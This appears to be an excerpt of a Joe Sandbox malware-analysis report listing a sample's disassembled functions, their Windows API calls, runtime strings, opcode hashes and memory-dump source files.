                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
                                                                                                                                                                                                                                                                                  • String ID: SeLockMemoryPrivilege
                                                                                                                                                                                                                                                                                  • API String ID: 1752251271-475654710
                                                                                                                                                                                                                                                                                  • Opcode ID: a64ce78d6ed104d2b6db937a96794cdf395e2d8bd2e23d037bc090c5da09f6ca
                                                                                                                                                                                                                                                                                  • Instruction ID: 9ad69481a873cedace5efb1be2b33115f8069d83784f96c9b7ee9cfa4bc9b3b5
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a64ce78d6ed104d2b6db937a96794cdf395e2d8bd2e23d037bc090c5da09f6ca
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48318265B0C7C386F760AB61EC046AAA7A6FB49B98F800035DA4D17758DE3DD1488F20
                                                                                                                                                                                                                                                                                  Function 00007FF72F5BEFE0 Relevance: 13.4, APIs: 5, Strings: 2, Instructions: 1181threadCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: SwitchThread$BreakCounterDebugPerformanceQuery
                                                                                                                                                                                                                                                                                  • String ID: GCHeap::Promote: Promote GC Root *%p = %p MT = %pT$Concurrent GC: Restarting EE
                                                                                                                                                                                                                                                                                  • API String ID: 30421299-2108734148
                                                                                                                                                                                                                                                                                  • Opcode ID: 6615c7b4db84cdefcc6dfb6fb544c900babefb5ec8c8e420ffc49294f2f83981
                                                                                                                                                                                                                                                                                  • Instruction ID: feba50ebdef91e20cd4428e7565158810ac78eaa07f14c8e0fb35ea3cd7a2a7e
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6615c7b4db84cdefcc6dfb6fb544c900babefb5ec8c8e420ffc49294f2f83981
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3C2A125B097C286FA55AF66EC503F8A7E0EF48B84FD84236D94E53795DF2CE4418B20
                                                                                                                                                                                                                                                                                  Function 00007FF72F5C1520 Relevance: 13.1, APIs: 8, Instructions: 1052threadCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: SwitchThread$BreakDebug
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 223621376-0
                                                                                                                                                                                                                                                                                  • Opcode ID: e5cb054ff7b66c56e3d29fbfe9d471ef182207bf6629e1d95f516b43b2c9ee66
                                                                                                                                                                                                                                                                                  • Instruction ID: db9aca3b43af2581aaa82e8f41db88aeda9a08f42f36da4c5bfff2d2882188c3
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5cb054ff7b66c56e3d29fbfe9d471ef182207bf6629e1d95f516b43b2c9ee66
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2B27C35B086C286FA64AF169C403F4A7A0EF59B94FD84235D95E437A1DF7CE480CA70
                                                                                                                                                                                                                                                                                  Function 00007FF72F5DF960 Relevance: 10.9, APIs: 7, Instructions: 416COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakDebug$CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3888577265-0
                                                                                                                                                                                                                                                                                  • Opcode ID: d86f80d7bffd3d43e5ca74b6d9e1eaf02e16cc952f2289a23396a127ac85969b
                                                                                                                                                                                                                                                                                  • Instruction ID: 21dabfa785af314382f27e73d9c10530382b563e7b59ac107c1e88527598aa82
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d86f80d7bffd3d43e5ca74b6d9e1eaf02e16cc952f2289a23396a127ac85969b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88126D26B0B7C682FA54AB12AC503B9A7E0FF88B84F944136D95D07795DF7CE490CB60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5DA7B0 Relevance: 10.9, APIs: 7, Instructions: 376COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakDebug$CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3888577265-0
                                                                                                                                                                                                                                                                                  • Opcode ID: c44e6f749cf51194d18055909887b503eb6a2aff37391a8996bb50217290c366
                                                                                                                                                                                                                                                                                  • Instruction ID: e720e4ab87fc681c73bdc8e313e59e2b35661ea213e5263761f0b2aaddd86703
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c44e6f749cf51194d18055909887b503eb6a2aff37391a8996bb50217290c366
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10028172B0A6C286FB55AB269D503B9B7A0FF44B84F844136DA5D037A6DF3CE451CB20
                                                                                                                                                                                                                                                                                  Function 00007FF72F5A6A50 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 241COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF72F5A73A0), ref: 00007FF72F5A6B07
                                                                                                                                                                                                                                                                                  • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF72F5A73A0), ref: 00007FF72F5A6C51
                                                                                                                                                                                                                                                                                  • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF72F5A73A0), ref: 00007FF72F5A6D33
                                                                                                                                                                                                                                                                                  • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF72F5A73A0), ref: 00007FF72F5A6D49
                                                                                                                                                                                                                                                                                  • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF72F5A73A0), ref: 00007FF72F5A6DBE
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: ExceptionFailFastRaise
                                                                                                                                                                                                                                                                                  • String ID: [ KeepUnwinding ]
                                                                                                                                                                                                                                                                                  • API String ID: 2546344036-400895726
                                                                                                                                                                                                                                                                                  • Opcode ID: 37b542edfd6e6a04d6d6af4a5e84d7cb03416debfb2b6644f32ce5e3f49ff12d
                                                                                                                                                                                                                                                                                  • Instruction ID: 13cc2dc3b3541544f078a950a8c8eab1a506a7b45feb0d35acee91d42ff0f21a
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37b542edfd6e6a04d6d6af4a5e84d7cb03416debfb2b6644f32ce5e3f49ff12d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33B1813270AB8585EB90AF26D8402E973E5FB44B88F984136CE5D07399DF39E465CF20
                                                                                                                                                                                                                                                                                  Function 00007FF72F60B64C Relevance: 4.5, APIs: 3, Instructions: 13COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,00007FF72F60AC51,?,?,?,?,00007FF72F5AFCD1,?,?,?), ref: 00007FF72F60B657
                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,00007FF72F60AC51,?,?,?,?,00007FF72F5AFCD1,?,?,?), ref: 00007FF72F60B660
                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00007FF72F60AC51,?,?,?,?,00007FF72F5AFCD1,?,?,?), ref: 00007FF72F60B666
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CurrentProcess
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 1249254920-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 4d85fabfa42be483c55bc1fb9b69dd090164f9bda100de10f29bc202a0794cc9
                                                                                                                                                                                                                                                                                  • Instruction ID: 51d2742156ae8bd444ee0dac6cebc90116c7983f36aa4eaa053be37b59d0000b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d85fabfa42be483c55bc1fb9b69dd090164f9bda100de10f29bc202a0794cc9
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63D0C751F0958786F7583761EC190756217FF5CF55F445034CE0B56310DD3D54858B20
                                                                                                                                                                                                                                                                                  Function 00007FF72F5DD320 Relevance: 3.3, APIs: 2, Instructions: 326threadCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: SwitchThread
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 115865932-0
                                                                                                                                                                                                                                                                                  • Opcode ID: ddf5a7c59728b91961856a1f3de8d77b860fc2794b24d806c874d2325e124f05
                                                                                                                                                                                                                                                                                  • Instruction ID: a6f3b7d58feeca5fcf5725cbdbda447a5b0caa1e59d0411c176d419d6bf621a3
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddf5a7c59728b91961856a1f3de8d77b860fc2794b24d806c874d2325e124f05
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44D17232B0AAC586EB60AF16D8007B9B360FB46794F844136DA6E47784DF7CE441CF60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5CB6B0 Relevance: 3.3, APIs: 2, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakDebug
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 456121617-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 24780f21546bd015505d40b07dff922e5db3dc92a0b137180c1451863a2d226f
                                                                                                                                                                                                                                                                                  • Instruction ID: ccc854cb386e4070efea201ce933e2e27bd2bc2d2bf93687177eed0083755530
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24780f21546bd015505d40b07dff922e5db3dc92a0b137180c1451863a2d226f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45E1AF36B09AC696EB10AF5ADC442B8B7A5EB05B94FD00235D95E077A4DF3CE481CB60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5E4A40 Relevance: 3.2, APIs: 2, Instructions: 171COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BuffersFlushProcessWrite
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2982998374-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 79d0f43756a16d64338861bbba21ee80fd32cc7b8ee7bde5ac8cae3f237e486d
                                                                                                                                                                                                                                                                                  • Instruction ID: 1d0f88d8421987c7266805ddb6c7b388c62cf3962f2894c82dec33f46fbdd049
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79d0f43756a16d64338861bbba21ee80fd32cc7b8ee7bde5ac8cae3f237e486d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F513B96B087C187EE61EA666D003F9EA95EB857C0F998131CE6D47BC2DE3CD940CB10
                                                                                                                                                                                                                                                                                  Function 00007FF72F5B0470 Relevance: 3.2, APIs: 2, Instructions: 162COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF72F5A4896,?,?,?,?,?,?,00007FF72F5A1EA0), ref: 00007FF72F5B0531
                                                                                                                                                                                                                                                                                  • GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF72F5A4896,?,?,?,?,?,?,00007FF72F5A1EA0), ref: 00007FF72F5B0590
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: EnabledFeaturesState
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 1557480591-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 6a010aaf3d9dfb2ad17c8b6f662b67376a88e00fe7fb95adbc059e65881bfa60
                                                                                                                                                                                                                                                                                  • Instruction ID: eea482c1d0a5ed0893bace7d0cda0611c20b543bcec7d4a44ca334cf5b1d5c09
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a010aaf3d9dfb2ad17c8b6f662b67376a88e00fe7fb95adbc059e65881bfa60
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA512432F0C29A06FF68585BD8993B98283FFD1B50F954538C94E936C9CD7FD8424A24
                                                                                                                                                                                                                                                                                  Function 00007FF72F5C9A50 Relevance: 3.0, Strings: 2, Instructions: 490COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: ========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}$@=}
